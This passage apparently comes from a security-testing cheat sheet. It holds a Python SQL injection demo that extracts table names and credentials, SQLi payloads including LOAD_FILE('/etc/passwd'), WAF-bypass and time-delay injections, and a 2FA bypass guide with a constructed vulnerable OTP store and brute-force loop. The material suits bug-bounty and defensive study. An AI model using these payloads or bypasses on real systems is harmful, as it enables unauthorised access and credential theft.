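            else:
                hi = mid
        if lo == 0:  # substr() past the end gives '' and unicode('') is NULL: string finished
            break
        out += chr(lo)
    return out


def run_demo():
    con = build_target()
    send = lambda payload: vulnerable_lookup(con, payload)  # stand-in for the HTTP request
    ncols = find_column_count(send)
    reflected = find_reflected_columns(send, ncols)
    col = reflected[0]
    version = extract(send, ncols, col, "sqlite_version()")
    return {
        "columns": ncols,
        "reflected": reflected,
        "version": version,
        "version_ok": version == sqlite3.sqlite_version,
        # group_concat() collapses many rows into one reflected cell, as on the page
        "tables": extract(send, ncols, col,
                          "SELECT group_concat(name) FROM sqlite_master WHERE type='table'"),
        "creds": extract(send, ncols, col,
                         "SELECT group_concat(username || ':' || password) FROM users"),
        "blind_admin_password": blind_extract(
            send, "SELECT password FROM users WHERE username='admin'"),
    }
```

Against a real target, replace `send` with a function that issues the request and returns the status code and body, keep the `-- ` terminator (or switch to `#` on MySQL), and compare on something more stable than the raw body if the page carries a CSRF token or timestamp that changes between responses.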
### 2. Database contents
```
Oracle      SELECT * FROM all_tables
            SELECT * FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE'

Microsoft   SELECT * FROM information_schema.tables
            SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'

PostgreSQL  SELECT * FROM information_schema.tables
            SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'

MySQL       SELECT * FROM information_schema.tables
            SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'
```
### 3. Show version, user and database name (MySQL)
```
' AND 1=2 UNION ALL SELECT concat_ws(0x3a,version(),user(),database())
```
(0x3a is ':'. The UNION must carry the same number of columns as the original query, so pad with NULL as found above.)

### 4. Using group_concat(), which joins every row of a result into one string (MySQL)
```
' union all select 1,2,3,group_concat(table_name),5,6 from information_schema.tables where table_schema=database()-- -
```
(Here the original query has six columns and the fourth is reflected in the page.)

## 4. Accessing system files with load_file(), and further exploitation afterwards :
```
' UNION ALL SELECT LOAD_FILE('/etc/passwd')-- -
```
LOAD_FILE() only returns data when the database user has the FILE privilege and the path is allowed by secure_file_priv; otherwise it silently returns NULL.

## 5. Bypassing WAF :

### 1. Using a null byte before the SQL query.
```
%00' UNION SELECT password FROM Users WHERE username='xyz'--
```
### 2. Using SQL inline comment sequences.
```
'/**/UN/**/ION/**/SEL/**/ECT/**/password/**/FR/**/OM/**/Users/**/WHE/**/RE/**/username/**/LIKE/**/'xyz'--
```
Comments in place of whitespace work on every major DBMS; whether a comment may split a keyword depends on the target's parser, so confirm it against the real backend before relying on it.
### 3. URL encoding
```
For example:
/ URL-encoded is %2f
* URL-encoded is %2a

Use double encoding if single encoding does not work, and hex encoding if neither does.
```
### 4. Changing case (uppercase/lowercase)
* For more step-by-step methods, go through the link below.

https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF
### 5. Use sqlmap tamper scripts. They help bypass WAF/IDS/IPS.
* 1. Use Atlas.
  Atlas suggests tamper scripts for sqlmap.

  https://github.com/m4ll0k/Atlas
* 2. JHaddix's post on sqlmap tamper scripts.

  https://forum.bugcrowd.com/t/sqlmap-tamper-scripts-sql-injection-and-waf-bypass/423

## 6. Time Delays :
```
Oracle      dbms_pipe.receive_message(('a'),10)

Microsoft   WAITFOR DELAY '0:0:10'

PostgreSQL  SELECT pg_sleep(10)

MySQL       SELECT sleep(10)
```
## 7. Conditional Delays :
```
Oracle      SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual

Microsoft   IF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10'

PostgreSQL  SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN pg_sleep(10) ELSE pg_sleep(0) END

MySQL       SELECT IF(YOUR-CONDITION-HERE,sleep(10),'a')
```
A delay only proves the condition true if the baseline is fast: time several unmodified requests first so that network jitter is not mistaken for a 10-second sleep.

# Resources and tools that will help gain an upper hand on finding bugs :
* PortSwigger SQL injection cheat sheet - https://portswigger.net/web-security/sql-injection/cheat-sheet
* httpx (the ProjectDiscovery HTTP prober used in method 2, not the Python client library of the same name) - https://github.com/projectdiscovery/httpx
* GF patterns - https://github.com/1ndianl33t/Gf-Patterns
* GF (tomnomnom) - https://github.com/tomnomnom/gf
* gau can also be combined with waybackurls to fetch all URLs.
* waybackurls - https://github.com/tomnomnom/waybackurls
* gau - https://github.com/lc/gau
* Arjun - https://github.com/s0md3v/Arjun
* hakrawler - https://github.com/hakluke/hakrawler


### Author :

* [@xhan1x](https://twitter.com/xhan1x)

--------------------------------------------------------------------------------
/Authentication_Bypass/2FA_Bypasses.md:
--------------------------------------------------------------------------------
# **2FA Bypass Techniques**

## **Introduction**
Two-Factor Authentication (2FA) adds a layer of protection by requiring a verification code in addition to the user's credentials. Implemented badly, it introduces flaws that let an attacker get past the second factor entirely.

This document outlines **common 2FA bypass techniques**, including **response manipulation, brute-force attacks, backup code abuse, and session hijacking**. Each method is described with examples and exploitation steps.

For a **visual reference**, the **[2FA Bypass Mindmap](https://mm.tt/1736437018?t=SEeZOmvt01)** gives an overview of the attack vectors.
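Several of the techniques catalogued below (code reuse, unlimited attempts, and codes not bound to the account they were issued for, techniques 5, 6 and 7) come from the same server-side mistake: treating the OTP as a bare secret rather than as state attached to one account, one attempt budget and one time window. The following is an added example written for this page, not code from the original author or any product: a constructed Python OTP store with exactly those flaws beside a hardened one, and the brute-force loop from technique 6 run against both. The `code=` argument on `issue()` exists only so the demo is deterministic.

```python
import hmac
import secrets
import time

OTP_DIGITS = 6


def random_code():
    """Six-digit numeric OTP, as used by most SMS and e-mail second factors."""
    return f"{secrets.randbelow(10 ** OTP_DIGITS):0{OTP_DIGITS}d}"


class WeakOtpStore:
    """Constructed for this example: every issued code lands in one global set, so a code
    is never single-use (technique 5), attempts are unlimited (technique 6) and the code
    is not bound to the account it was sent to (technique 7)."""

    def __init__(self):
        self.codes = set()

    def issue(self, user, code=None):
        code = code or random_code()  # `code` is only for deterministic demos/tests
        self.codes.add(code)
        return code

    def verify(self, user, code):
        return code in self.codes  # `user` is ignored: any code works for anyone, forever


class HardenedOtpStore:
    """One pending code per account, single use, five attempts, five-minute lifetime."""

    MAX_ATTEMPTS = 5
    TTL_SECONDS = 300

    def __init__(self, clock=time.monotonic):
        self.clock = clock
        self.pending = {}  # user -> [code, issued_at, failed_attempts]

    def issue(self, user, code=None):
        code = code or random_code()
        self.pending[user] = [code, self.clock(), 0]  # re-issuing replaces the old code
        return code

    def verify(self, user, code):
        entry = self.pending.get(user)
        if entry is None:
            return False  # nothing pending for this account
        expected, issued_at, attempts = entry
        if self.clock() - issued_at > self.TTL_SECONDS:
            del self.pending[user]
            return False  # expired: the user must request a new code
        if attempts >= self.MAX_ATTEMPTS:
            del self.pending[user]
            return False  # too many failures: invalidate and force a re-issue
        if hmac.compare_digest(expected, code):
            del self.pending[user]  # correct: consume it so it cannot be replayed
            return True
        entry[2] += 1
        return False


def brute_force(store, user):
    """Technique 6 against either store: walk the whole code space in order.
    Returns (code, attempts_needed) on success, None if the store never accepts one."""
    for n in range(10 ** OTP_DIGITS):
        candidate = f"{n:0{OTP_DIGITS}d}"
        if store.verify(user, candidate):
            return candidate, n + 1
    return None
```

When testing a target, the three checks map directly onto requests: submit the same code twice (technique 5), submit a code issued to your own account while authenticating to another (technique 7), and count how many wrong codes the endpoint accepts before it locks, slows down or invalidates the code (technique 6).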

---

## **Common 2FA Bypass Techniques**

### **Index of Techniques**
| # | **Technique** |
|----|--------------|
| **1** | Response Manipulation |
| **2** | Status Code Manipulation |
| **3** | 2FA Code Leakage in API Responses |
| **4** | JavaScript File Analysis |
| **5** | 2FA Code Reusability |
| **6** | Lack of Brute-Force Protection |
| **7** | Missing 2FA Code Integrity Validation |
| **8** | CSRF on 2FA Disabling |
| **9** | Password Reset Disables 2FA |
| **10** | Backup Code Abuse |
| **11** | Clickjacking on 2FA Disabling Page |
| **12** | Enabling 2FA Without Expiring Active Sessions |
| **13** | Bypass 2FA with `null` or `000000` |

---

## **1. Response Manipulation**
Some 2FA implementations return a JSON response that tells the client whether verification succeeded, and the client decides what to show next. **Altering that response** bypasses the check when the server does not itself record that the second factor was completed.

### **Exploitation**
- Intercept the response using **Burp Suite** or **a browser's developer tools**.
- Look for a response like:
  ```json
  { "success": false }
  ```
- Change it to:
  ```json
  { "success": true }
  ```
- If the 2FA state is enforced only client-side, access is granted. Confirm by requesting an authenticated page directly afterwards: if the server serves it, the bypass is real; if it redirects back to the 2FA prompt, only the UI was fooled.

---

## **2. Status Code Manipulation**
Some applications rely on the HTTP status code to determine authentication success.

### **Exploitation**
- If a **4xx error** (e.g., `401 Unauthorized`) is returned after entering a **wrong** 2FA code, modify the response status line to:
  ```
  HTTP/1.1 200 OK
  ```
- Some applications then grant access **even though verification failed**. The same server-side confirmation as in technique 1 applies.

---

## **3. 2FA Code Leakage in API Responses**
Some applications accidentally **leak the 2FA code** in their API response.

### **Exploitation**
- Intercept the **request that triggers the 2FA code**.
- Examine the API response.
- If the response contains:
  ```json
  { "otp": "123456" }
  ```
- The attacker can **use the leaked OTP** directly, without access to the victim's phone or mailbox.

---

## **4. JavaScript File Analysis**
Some applications ship **2FA-related logic** in their JavaScript files.

### **Exploitation**
- Check the `.js` files the application loads.
- Look for sensitive **hardcoded values** like:
  ```javascript
  var otp = "123456";
  ```
- From the client code an attacker can **extract the OTP verification logic** or a **static OTP**; any check that lives only in the browser can be skipped.

---

## **5. 2FA Code Reusability**
Some applications **do not invalidate an OTP after it has been used**, allowing attackers to **reuse** it.

### **Exploitation**
- Obtain a **valid OTP** from a previous session (for example one observed in transit or in a log).
- Submit the same OTP again in a new authentication attempt.
- If the system does not enforce **one-time use**, the **old OTP grants access**. Also check whether a code is still accepted after its time window should have expired.

---

## **6. Lack of Brute-Force Protection**
Applications that **do not limit OTP attempts** can be brute-forced.

### **Exploitation**
- Identify the **number of OTP digits** (commonly `4`-`6`).
- Use a tool like **Burp Intruder** to try every value; for a 6-digit code that is:
  ```
  000000 - 999999
  ```
- Without an attempt limit, lockout or code expiry the attacker eventually submits the correct OTP: a 6-digit numeric code is only one million guesses, a 4-digit one ten thousand.

---

## **7. Missing 2FA Code Integrity Validation**
Some systems accept **any valid OTP**, even one issued to a different account.

### **Exploitation**
- Obtain a **valid OTP** for **Account A** (an account you control).
- Submit the **same OTP** while authenticating to **Account B**.
- If the system **does not verify that the OTP was issued to the account being authenticated**, access is granted.

---

## **8. CSRF on 2FA Disabling**
Some applications **lack CSRF protection** on the request that disables 2FA.

### **Exploitation**
- Construct a **malicious request** that disables 2FA: an HTML form on a page you control, pointed at the application's 2FA-disable endpoint with the same parameters the legitimate request carries.
- Trick the victim into **submitting the form** (or auto-submit it with JavaScript) while they are logged in; their browser attaches their session cookie and 2FA is disabled on their account.

---

## **9. Password Reset Disables 2FA**
Some systems **disable 2FA** when a user resets their password.

### **Exploitation**
- On an account with 2FA enabled, perform a **password reset**.
- Check whether **2FA is still active** after the reset.
- If **2FA has been disabled**, log in **without the second factor**.

---

## **10. Backup Code Abuse**
Backup codes provide an **alternative way to log in** when the OTP is unavailable.

### **Exploitation**
- If backup codes are stored or transmitted **insecurely**, they can be leaked or stolen; they deserve the same brute-force and reuse tests as OTPs.
- Some applications **do not invalidate backup codes after use**, so a single leaked code works repeatedly.

---

## **11. Clickjacking on 2FA Disabling Page**
Some applications allow **2FA to be disabled** without additional verification (no password or current-OTP re-prompt).

### **Exploitation**
- Load the **2FA disabling page** in an `